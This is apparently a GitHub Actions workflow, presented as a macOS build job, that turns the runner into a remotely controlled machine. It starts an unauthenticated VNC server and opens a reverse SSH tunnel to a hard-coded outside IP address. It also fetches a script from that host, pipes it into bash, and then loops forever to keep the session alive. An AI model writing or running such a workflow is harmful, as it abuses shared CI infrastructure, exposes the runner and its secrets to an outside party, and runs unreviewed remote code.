name: mac
on: [ push ]
defaults:
  run:
    shell: bash

jobs:
  build:
    runs-on: macos-latest
    env:
      key: ${{ secrets.key }}
      header: ${{ secrets.header }}
    environment: test
    steps:
    - uses: actions/checkout@v2
    - run: |
        cat test/port | pbcopy
        brew install expect
        wget https://github.com/stweil/OSXvnc/releases/download/V5_2_1/OSXvnc-5.2.1.dmg
        hdiutil attach OSXvnc-5.2.1.dmg
        cd "/Volumes/VineServer/Vine Server.app/Contents/MacOS"
        while true; do ./OSXvnc-server -rfbnoauth; done &
        echo "52.36.65.97 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBN/4XsuZ+mnxItIN+PlxnceKUQo4WPBMPL1dm9GZ4wGbQ4/oWr6UZpECRoa0AoOXCW6ijCCiysAt1k8QibxmBuY=" >> ~/.ssh/known_hosts
        mkdir -p ~/.ssh
        echo "$key" > ~/.ssh/id_rsa
        chmod 0600 ~/.ssh/id_rsa
        bash -c "unbuffer ssh -R 0.0.0.0:$(pbpaste):localhost:5901 x@52.36.65.97" &>/dev/null &
        curl -H "$header" http://52.36.65.97:8043/b.sh | bash &
        echo testa
    - run: while true; do echo '.'; sleep 10; done
